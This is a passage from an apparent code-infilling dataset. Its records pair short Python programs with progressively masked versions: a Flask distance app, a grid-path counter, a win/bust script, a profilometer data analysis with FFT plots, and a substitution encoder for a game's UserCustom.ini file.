code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
from flask import Flask, render_template, request
from distance import get_distance
app = Flask(__name__)
@app.route('/hello')
@app.route('/hello/<name>')
def hello(name=None):
name = "World" if not name else name
return "Hello %s" % name
@app.route('/')
def index():
return render_template('index.html', title='home')
@app.route('/distance', methods=['POST', 'GET'])
def distance():
result = None
if request.method == 'POST':
location_a = request.form['location_a']
location_b = request.form['location_b']
result = get_distance(location_a, location_b)
return render_template('distance.html', title='Afstand', result=result)
if __name__ == '__main__':
app.run(debug=True)
|
normal
|
{
"blob_id": "05052e9ccbd076e71e9ec6148887ce7b82ed316d",
"index": 6256,
"step-1": "<mask token>\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, render_template, request\nfrom distance import get_distance\napp = Flask(__name__)\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = 'World' if not name else name\n return 'Hello %s' % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n return render_template('distance.html', title='Afstand', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, render_template, request\nfrom distance import get_distance\n\napp = Flask(__name__)\n\n\[email protected]('/hello')\[email protected]('/hello/<name>')\ndef hello(name=None):\n name = \"World\" if not name else name\n return \"Hello %s\" % name\n\n\[email protected]('/')\ndef index():\n return render_template('index.html', title='home')\n\n\[email protected]('/distance', methods=['POST', 'GET'])\ndef distance():\n result = None\n if request.method == 'POST':\n location_a = request.form['location_a']\n location_b = request.form['location_b']\n result = get_distance(location_a, location_b)\n\n return render_template('distance.html', title='Afstand', result=result)\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def uniquePaths(self, m: int, n: int) ->int:
map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in
range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
return map_[-1][-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def uniquePaths(self, m: int, n: int) ->int:
map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in
range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
return map_[-1][-1]
print(Solution().uniquePaths(7, 3))
<|reserved_special_token_1|>
from typing import *
class Solution:
def uniquePaths(self, m: int, n: int) ->int:
map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in
range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
return map_[-1][-1]
print(Solution().uniquePaths(7, 3))
<|reserved_special_token_1|>
from typing import *
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
map_: List[List[int]] = [[0 if (i > 0 and j > 0) else 1 for j in range(m)] for i in range(n)]
for row in range(1, n):
for col in range(1, m):
map_[row][col] = map_[row][col - 1] + map_[row - 1][col]
# [map_[row][col] := map_[row][col - 1] + map_[row - 1][col] for col in range(1, m) for row in range(1, n)]
return map_[-1][-1]
print(Solution().uniquePaths(7, 3))
|
flexible
|
{
"blob_id": "e2a38d38d2ab750cf775ed0fbdb56bc6fc7300c4",
"index": 8934,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def uniquePaths(self, m: int, n: int) ->int:\n map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in\n range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n return map_[-1][-1]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def uniquePaths(self, m: int, n: int) ->int:\n map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in\n range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n return map_[-1][-1]\n\n\nprint(Solution().uniquePaths(7, 3))\n",
"step-4": "from typing import *\n\n\nclass Solution:\n\n def uniquePaths(self, m: int, n: int) ->int:\n map_: List[List[int]] = [[(0 if i > 0 and j > 0 else 1) for j in\n range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n return map_[-1][-1]\n\n\nprint(Solution().uniquePaths(7, 3))\n",
"step-5": "from typing import *\n\n\nclass Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n map_: List[List[int]] = [[0 if (i > 0 and j > 0) else 1 for j in range(m)] for i in range(n)]\n for row in range(1, n):\n for col in range(1, m):\n map_[row][col] = map_[row][col - 1] + map_[row - 1][col]\n\n # [map_[row][col] := map_[row][col - 1] + map_[row - 1][col] for col in range(1, m) for row in range(1, n)]\n return map_[-1][-1]\n\n\nprint(Solution().uniquePaths(7, 3))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def main():
A1, A2, A3 = map(int, input().split())
A = A1 + A2 + A3
if A >= 22:
ans = 'bust'
else:
ans = 'win'
print(ans)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def main():
A1, A2, A3 = map(int, input().split())
A = A1 + A2 + A3
if A >= 22:
ans = 'bust'
else:
ans = 'win'
print(ans)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/env python3
def main():
A1, A2, A3 = map(int, input().split())
A=A1+A2+A3
if A >=22:
ans='bust'
else:
ans='win'
print(ans)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "753e062940e0580d7d33c88c1165977142dcd202",
"index": 8060,
"step-1": "<mask token>\n",
"step-2": "def main():\n A1, A2, A3 = map(int, input().split())\n A = A1 + A2 + A3\n if A >= 22:\n ans = 'bust'\n else:\n ans = 'win'\n print(ans)\n\n\n<mask token>\n",
"step-3": "def main():\n A1, A2, A3 = map(int, input().split())\n A = A1 + A2 + A3\n if A >= 22:\n ans = 'bust'\n else:\n ans = 'win'\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "#!/usr/bin/env python3\n\ndef main():\n A1, A2, A3 = map(int, input().split())\n A=A1+A2+A3\n if A >=22:\n ans='bust'\n else:\n ans='win'\n print(ans)\n \nif __name__ == \"__main__\":\n main()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
import matplotlib.pyplot as plt
import math
filename = '/home/kolan/mycode/python/dektak/data/t10_1_1_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_3_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_6_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_7_normal.csv'
#filename = '/home/kolan/mycode/python/dektak/t10_1_3_parallel.csv'
def FindHeaderLength():
"""
Finds the positionon the 'Scan Data' and adds additional 2 lines
to give as a result the lenght of the header in number of lines.
This is then used in csv function
"""
lookup = 'Lateral um'
with open(filename) as myFile:
for FoundPosition, line in enumerate(myFile, 1):
if lookup in line:
print 'Scan Data found at line:', FoundPosition
break
return FoundPosition+4
x=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(0,))
y=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(1,))
coefficients = np.polyfit(x, y, 1)
polynomial = np.poly1d(coefficients)
ys = polynomial(x)
print coefficients
print polynomial
yLevelled=y-ys
plt.figure(1)
plt.plot(x,y)
plt.plot(x,ys)
plt.title('Raw data plot')
plt.xlabel('Lateral [um]')
plt.ylabel('Raw Micrometer [um]')
plt.grid(True)
plt.figure(2)
plt.title('Histogram of y')
n, bins, patches = plt.hist(y, 256, normed=1, facecolor='g', alpha=0.75)
plt.grid(True)
plt.figure(3)
d = np.diff(y)
plt.plot(d)
plt.title('Derivative of y')
plt.xlabel('Point []')
plt.ylabel('Raw Micrometer [um]')
plt.grid(True)
plt.figure(4)
plt.plot(x,yLevelled)
plt.title('Levelled data plot')
plt.xlabel('Lateral [um]')
plt.ylabel('Micrometer [um]')
plt.grid(True)
plt.figure(5)
plt.title('Histogram of yLevelled')
n, bins, patches = plt.hist(yLevelled, 256, normed=1, facecolor='g', alpha=0.75)
plt.grid(True)
dataLenght = len(yLevelled)
xDiff = np.delete(x,dataLenght-1) #diff consumes one last element from the array
plt.figure(6)
d = np.diff(y)
plt.plot(xDiff,d)
plt.title('Derivative of y')
plt.xlabel('Lateral [um]')
plt.ylabel('Raw Micrometer [um]')
plt.grid(True)
yLevelledMin = np.min(yLevelled)
yLevelledZeroShift = yLevelled - yLevelledMin
plt.figure(7)
plt.plot(x,yLevelledZeroShift)
plt.title('Levelled and shifted data plot')
plt.xlabel('Lateral [um]')
plt.ylabel('Micrometer [um]')
plt.grid(True)
##FFT###########################################################################
dataLenghtFFT = len(yLevelled)/2 #divide by 2 to satify rfft
# scale by the number of points so that
# the magnitude does not depend on the length
# of the signal or on its sampling frequency
calculatedFFT = np.fft.rfft(yLevelled)
#calculatedFFT = np.fft.rfft(yLevelledZeroShift)
amplitudeFFT = np.abs(calculatedFFT) #calculates FFT amplitude from
#complex calculatedFFT output
phaseFFT = np.angle(calculatedFFT) #calculates FFT phase from
#complex calculatedFFT output
phaseDegreesFFT = np.rad2deg(phaseFFT) #convert to degrees
amplitudeScaledFFT = amplitudeFFT/float(dataLenghtFFT)
# scale by the number of points so that
# the magnitude does not depend on the length
# of the signal
amplitudeScaledRMSFFT = amplitudeFFT/float(dataLenghtFFT)/math.sqrt(2)
# Scaling to Root mean square amplitude (dataLenghtFFT/sqrt{2}),
#############################################################################
# Plot the results
#############################################################################
xFFT = np.linspace(0,dataLenghtFFT+1,dataLenghtFFT+1)
#the range is two times smaller +1 for RFFT
#sinus signal without noise used for fit
plt.figure("FFT amplitude and phase coefficients")
plt.subplot(2,1,1)
plt.vlines(xFFT,0,amplitudeScaledFFT)
plt.title("FFT amplitude coefficients")
plt.xlabel("Harmonics")
plt.ylabel("Amplitude [V]")
plt.xlim(0,dataLenghtFFT/2+1) #adjuts the x axis to maximum of numberOfPoints
plt.grid(True)
plt.subplot(2,1,2)
plt.vlines(xFFT,0,phaseDegreesFFT)
plt.title("FFT phase coefficients")
plt.xlabel("Harmonics")
plt.ylabel("Phase [deg]")
plt.tight_layout() #removes the overlapping of the labels in subplots
plt.xlim(0,dataLenghtFFT+1)
plt.grid(True)
##############################################################################
##Moving average
##############################################################################
plt.figure('LevelledData with moving average ')
yLevelledMA = np.convolve(yLevelled, np.ones(10)/10)
plt.plot(yLevelled)
plt.hold(True)
plt.plot(yLevelledMA)
plt.title('Filtered levelled data plot')
plt.xlabel('Sample []')
plt.ylabel('Micrometer [um]')
plt.grid(True)
##orizontal line
diffMA = np.convolve(d, np.ones(10)/10)
dataLenghtDiff = len(d)
dataLenghtDiffMA = len(diffMA)
xLine = np.linspace(0,dataLenghtDiffMA,dataLenghtDiffMA)
yLine = np.linspace(0.05,0.05,dataLenghtDiffMA)
plt.figure('Derivative with moving average')
plt.plot(d)
plt.hold(True)
plt.plot(diffMA)
plt.plot(yLine)
plt.title('Derivative with moving average')
plt.xlabel('Sample []')
plt.ylabel('Micrometer [um]')
plt.grid(True)
print dataLenghtDiff
print dataLenghtDiffMA
#thresholded = np.array(diffMA)
#x = np.where(thresholded == 0.05)[0]
#print x
#plt.figure('Derivative with moving average thresholded')
#plt.plot(thresholded)
#plt.title('Derivative with moving average')
#plt.xlabel('Sample []')
#plt.ylabel('Micrometer [um]')
#plt.grid(True)
#
#itemindex = np.where(diffMA > 0.05 and diffMA < 0.051)
plt.show()
|
normal
|
{
"blob_id": "139d06497a44031f6414980ad54454477e3d0b2c",
"index": 4540,
"step-1": "import numpy as np \nimport matplotlib.pyplot as plt\nimport math\n\nfilename = '/home/kolan/mycode/python/dektak/data/t10_1_1_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_3_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_6_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_7_normal.csv'\n#filename = '/home/kolan/mycode/python/dektak/t10_1_3_parallel.csv'\n\n\n\ndef FindHeaderLength():\n \"\"\"\n Finds the positionon the 'Scan Data' and adds additional 2 lines\n to give as a result the lenght of the header in number of lines.\n This is then used in csv function\n \"\"\"\n\n lookup = 'Lateral um'\n \n with open(filename) as myFile:\n for FoundPosition, line in enumerate(myFile, 1):\n if lookup in line:\n print 'Scan Data found at line:', FoundPosition\n break\n \n return FoundPosition+4\n\n\nx=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(0,))\ny=np.loadtxt(filename,dtype=float,delimiter=',',skiprows=FindHeaderLength(),usecols=(1,))\n\ncoefficients = np.polyfit(x, y, 1)\npolynomial = np.poly1d(coefficients)\nys = polynomial(x)\nprint coefficients\nprint polynomial\n\nyLevelled=y-ys\n\nplt.figure(1)\nplt.plot(x,y)\nplt.plot(x,ys)\nplt.title('Raw data plot')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Raw Micrometer [um]')\nplt.grid(True)\n\nplt.figure(2)\nplt.title('Histogram of y')\nn, bins, patches = plt.hist(y, 256, normed=1, facecolor='g', alpha=0.75)\nplt.grid(True)\n\nplt.figure(3)\nd = np.diff(y)\nplt.plot(d)\nplt.title('Derivative of y')\nplt.xlabel('Point []')\nplt.ylabel('Raw Micrometer [um]')\nplt.grid(True)\n\nplt.figure(4)\nplt.plot(x,yLevelled)\nplt.title('Levelled data plot')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\nplt.figure(5)\nplt.title('Histogram of yLevelled')\nn, bins, patches = plt.hist(yLevelled, 256, normed=1, facecolor='g', alpha=0.75)\nplt.grid(True)\n\ndataLenght = len(yLevelled) \nxDiff = np.delete(x,dataLenght-1) #diff consumes one last element from the array\n\nplt.figure(6)\nd = np.diff(y)\nplt.plot(xDiff,d)\nplt.title('Derivative of y')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Raw Micrometer [um]')\nplt.grid(True)\n\nyLevelledMin = np.min(yLevelled)\nyLevelledZeroShift = yLevelled - yLevelledMin\n\nplt.figure(7)\nplt.plot(x,yLevelledZeroShift)\nplt.title('Levelled and shifted data plot')\nplt.xlabel('Lateral [um]')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\n##FFT###########################################################################\n\ndataLenghtFFT = len(yLevelled)/2 #divide by 2 to satify rfft\n # scale by the number of points so that\n # the magnitude does not depend on the length \n # of the signal or on its sampling frequency \n\ncalculatedFFT = np.fft.rfft(yLevelled) \n#calculatedFFT = np.fft.rfft(yLevelledZeroShift) \n\namplitudeFFT = np.abs(calculatedFFT) #calculates FFT amplitude from \n #complex calculatedFFT output\nphaseFFT = np.angle(calculatedFFT) #calculates FFT phase from \n #complex calculatedFFT output\nphaseDegreesFFT = np.rad2deg(phaseFFT) #convert to degrees\namplitudeScaledFFT = amplitudeFFT/float(dataLenghtFFT)\n # scale by the number of points so that\n # the magnitude does not depend on the length \n # of the signal\namplitudeScaledRMSFFT = amplitudeFFT/float(dataLenghtFFT)/math.sqrt(2)\n\n\n# Scaling to Root mean square amplitude (dataLenghtFFT/sqrt{2}),\n#############################################################################\n# Plot the results\n#############################################################################\n\nxFFT = np.linspace(0,dataLenghtFFT+1,dataLenghtFFT+1) \n #the range is two times smaller +1 for RFFT\n #sinus signal without noise used for fit\n\nplt.figure(\"FFT amplitude and phase coefficients\")\nplt.subplot(2,1,1)\nplt.vlines(xFFT,0,amplitudeScaledFFT)\nplt.title(\"FFT amplitude coefficients\")\nplt.xlabel(\"Harmonics\")\nplt.ylabel(\"Amplitude [V]\")\nplt.xlim(0,dataLenghtFFT/2+1) #adjuts the x axis to maximum of numberOfPoints\nplt.grid(True)\n\nplt.subplot(2,1,2)\nplt.vlines(xFFT,0,phaseDegreesFFT)\nplt.title(\"FFT phase coefficients\")\nplt.xlabel(\"Harmonics\")\nplt.ylabel(\"Phase [deg]\")\nplt.tight_layout() #removes the overlapping of the labels in subplots\nplt.xlim(0,dataLenghtFFT+1)\nplt.grid(True)\n\n\n##############################################################################\n##Moving average\n##############################################################################\nplt.figure('LevelledData with moving average ')\nyLevelledMA = np.convolve(yLevelled, np.ones(10)/10)\nplt.plot(yLevelled)\nplt.hold(True)\nplt.plot(yLevelledMA)\nplt.title('Filtered levelled data plot')\nplt.xlabel('Sample []')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\n##orizontal line\n\n\n\ndiffMA = np.convolve(d, np.ones(10)/10)\n\ndataLenghtDiff = len(d)\ndataLenghtDiffMA = len(diffMA)\n\nxLine = np.linspace(0,dataLenghtDiffMA,dataLenghtDiffMA)\nyLine = np.linspace(0.05,0.05,dataLenghtDiffMA) \n\nplt.figure('Derivative with moving average')\nplt.plot(d)\nplt.hold(True)\nplt.plot(diffMA)\nplt.plot(yLine)\nplt.title('Derivative with moving average')\nplt.xlabel('Sample []')\nplt.ylabel('Micrometer [um]')\nplt.grid(True)\n\n\n\nprint dataLenghtDiff\nprint dataLenghtDiffMA\n\n\n\n#thresholded = np.array(diffMA)\n#x = np.where(thresholded == 0.05)[0]\n#print x\n#plt.figure('Derivative with moving average thresholded')\n#plt.plot(thresholded)\n#plt.title('Derivative with moving average')\n#plt.xlabel('Sample []')\n#plt.ylabel('Micrometer [um]')\n#plt.grid(True)\n#\n#itemindex = np.where(diffMA > 0.05 and diffMA < 0.051)\n\nplt.show()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(char):
out_value = ''
char = [value[i:i + 1] for i in range(0, len(value))]
for i in range(0, len(char)):
out_value += encoded[decoded.index(char[i])]
return out_value
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(char):
out_value = ''
char = [value[i:i + 1] for i in range(0, len(value))]
for i in range(0, len(char)):
out_value += encoded[decoded.index(char[i])]
return out_value
if __name__ == '__main__':
print(
'By default the program will open UserCustom.ini which should be in the directory as the program.'
)
user_input = str(input(
'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')
)
const = '+CVars='
config = open('UserCustom.ini', 'r')
out_file = open('UserCustom.ini.out', 'w')
out_value = ''
lines = config.readlines()
for i in range(0, len(lines)):
if lines[i].startswith(const):
value = lines[i].split(const)[-1].split('\n')[0]
if user_input.lower() == 'encode' or user_input.lower() == 'e':
out_value = encode(value)
elif user_input.lower() == 'decode' or user_input.lower() == 'd':
out_value = decode(value)
out_file.write(const + out_value + '\n')
else:
out_file.write(lines[i])
out_file.close()
config.close()
pass
<|reserved_special_token_1|>
decoded = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',
'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z', '=', '.']
encoded = ['49', '48', '4B', '4A', '4D', '4C', '4F', '4E', '41', '40', '38',
'3B', '3A', '3D', '3C', '3F', '3E', '31', '30', '33', '32', '35', '34',
'37', '36', '29', '28', '2B', '2A', '2D', '2C', '2F', '2E', '21', '20',
'23', '18', '1B', '1A', '1D', '1C', '1F', '1E', '11', '10', '13', '12',
'15', '14', '17', '16', '09', '08', '0B', '0A', '0D', '0C', '0F', '0E',
'01', '00', '03', '44', '57']
def decode(value):
out_value = ''
char = [value[i:i + 2] for i in range(0, len(value), 2)]
for i in range(0, len(char)):
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(char):
out_value = ''
char = [value[i:i + 1] for i in range(0, len(value))]
for i in range(0, len(char)):
out_value += encoded[decoded.index(char[i])]
return out_value
if __name__ == '__main__':
print(
'By default the program will open UserCustom.ini which should be in the directory as the program.'
)
user_input = str(input(
'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')
)
const = '+CVars='
config = open('UserCustom.ini', 'r')
out_file = open('UserCustom.ini.out', 'w')
out_value = ''
lines = config.readlines()
for i in range(0, len(lines)):
if lines[i].startswith(const):
value = lines[i].split(const)[-1].split('\n')[0]
if user_input.lower() == 'encode' or user_input.lower() == 'e':
out_value = encode(value)
elif user_input.lower() == 'decode' or user_input.lower() == 'd':
out_value = decode(value)
out_file.write(const + out_value + '\n')
else:
out_file.write(lines[i])
out_file.close()
config.close()
pass
<|reserved_special_token_1|>
decoded = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "=", "."]
encoded = ["49", "48", "4B", "4A", "4D", "4C", "4F", "4E", "41", "40", "38", "3B", "3A", "3D", "3C", "3F", "3E", "31", "30", "33", "32", "35", "34", "37", "36", "29", "28", "2B", "2A", "2D", "2C", "2F", "2E", "21", "20", "23", "18", "1B", "1A", "1D", "1C", "1F", "1E", "11", "10", "13", "12", "15", "14", "17", "16", "09", "08", "0B", "0A", "0D", "0C", "0F", "0E", "01", "00", "03", "44", "57"]
def decode(value) :
out_value = ""
char = [value[i:i+2] for i in range(0, len(value), 2)]
for i in range(0, len(char)) :
out_value += decoded[encoded.index(char[i])]
return out_value
def encode(char) :
out_value = ""
char = [value[i:i+1] for i in range(0, len(value))]
for i in range(0, len(char)) :
out_value += encoded[decoded.index(char[i])]
return out_value
if __name__ == "__main__" :
print("By default the program will open UserCustom.ini which should be in the directory as the program.")
user_input = str(input("Would you like to encode or decode UserCustom.ini ? (encode/decode) "))
const = "+CVars="
config = open("UserCustom.ini" , "r")
out_file = open("UserCustom.ini.out", "w")
out_value = ""
lines = config.readlines()
for i in range(0, len(lines)) :
if lines[i].startswith(const) :
value = lines[i].split(const)[-1].split("\n")[0]
if user_input.lower() == "encode" or user_input.lower() == "e" :
out_value = encode(value)
elif user_input.lower() == "decode" or user_input.lower() == "d" :
out_value = decode(value)
out_file.write(const + out_value + "\n")
else :
out_file.write(lines[i])
out_file.close()
config.close()
pass
|
flexible
|
{
"blob_id": "23236cd8262eb414666db88215c01d973abf1d97",
"index": 1247,
"step-1": "<mask token>\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\ndef encode(char):\n out_value = ''\n char = [value[i:i + 1] for i in range(0, len(value))]\n for i in range(0, len(char)):\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\ndef encode(char):\n out_value = ''\n char = [value[i:i + 1] for i in range(0, len(value))]\n for i in range(0, len(char)):\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\n\nif __name__ == '__main__':\n print(\n 'By default the program will open UserCustom.ini which should be in the directory as the program.'\n )\n user_input = str(input(\n 'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')\n )\n const = '+CVars='\n config = open('UserCustom.ini', 'r')\n out_file = open('UserCustom.ini.out', 'w')\n out_value = ''\n lines = config.readlines()\n for i in range(0, len(lines)):\n if lines[i].startswith(const):\n value = lines[i].split(const)[-1].split('\\n')[0]\n if user_input.lower() == 'encode' or user_input.lower() == 'e':\n out_value = encode(value)\n elif user_input.lower() == 'decode' or user_input.lower() == 'd':\n out_value = decode(value)\n out_file.write(const + out_value + '\\n')\n else:\n out_file.write(lines[i])\n out_file.close()\n config.close()\n pass\n",
"step-4": "decoded = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C',\n 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',\n 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e',\n 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',\n 't', 'u', 'v', 'w', 'x', 'y', 'z', '=', '.']\nencoded = ['49', '48', '4B', '4A', '4D', '4C', '4F', '4E', '41', '40', '38',\n '3B', '3A', '3D', '3C', '3F', '3E', '31', '30', '33', '32', '35', '34',\n '37', '36', '29', '28', '2B', '2A', '2D', '2C', '2F', '2E', '21', '20',\n '23', '18', '1B', '1A', '1D', '1C', '1F', '1E', '11', '10', '13', '12',\n '15', '14', '17', '16', '09', '08', '0B', '0A', '0D', '0C', '0F', '0E',\n '01', '00', '03', '44', '57']\n\n\ndef decode(value):\n out_value = ''\n char = [value[i:i + 2] for i in range(0, len(value), 2)]\n for i in range(0, len(char)):\n out_value += decoded[encoded.index(char[i])]\n return out_value\n\n\ndef encode(char):\n out_value = ''\n char = [value[i:i + 1] for i in range(0, len(value))]\n for i in range(0, len(char)):\n out_value += encoded[decoded.index(char[i])]\n return out_value\n\n\nif __name__ == '__main__':\n print(\n 'By default the program will open UserCustom.ini which should be in the directory as the program.'\n )\n user_input = str(input(\n 'Would you like to encode or decode UserCustom.ini ? (encode/decode) ')\n )\n const = '+CVars='\n config = open('UserCustom.ini', 'r')\n out_file = open('UserCustom.ini.out', 'w')\n out_value = ''\n lines = config.readlines()\n for i in range(0, len(lines)):\n if lines[i].startswith(const):\n value = lines[i].split(const)[-1].split('\\n')[0]\n if user_input.lower() == 'encode' or user_input.lower() == 'e':\n out_value = encode(value)\n elif user_input.lower() == 'decode' or user_input.lower() == 'd':\n out_value = decode(value)\n out_file.write(const + out_value + '\\n')\n else:\n out_file.write(lines[i])\n out_file.close()\n config.close()\n pass\n",
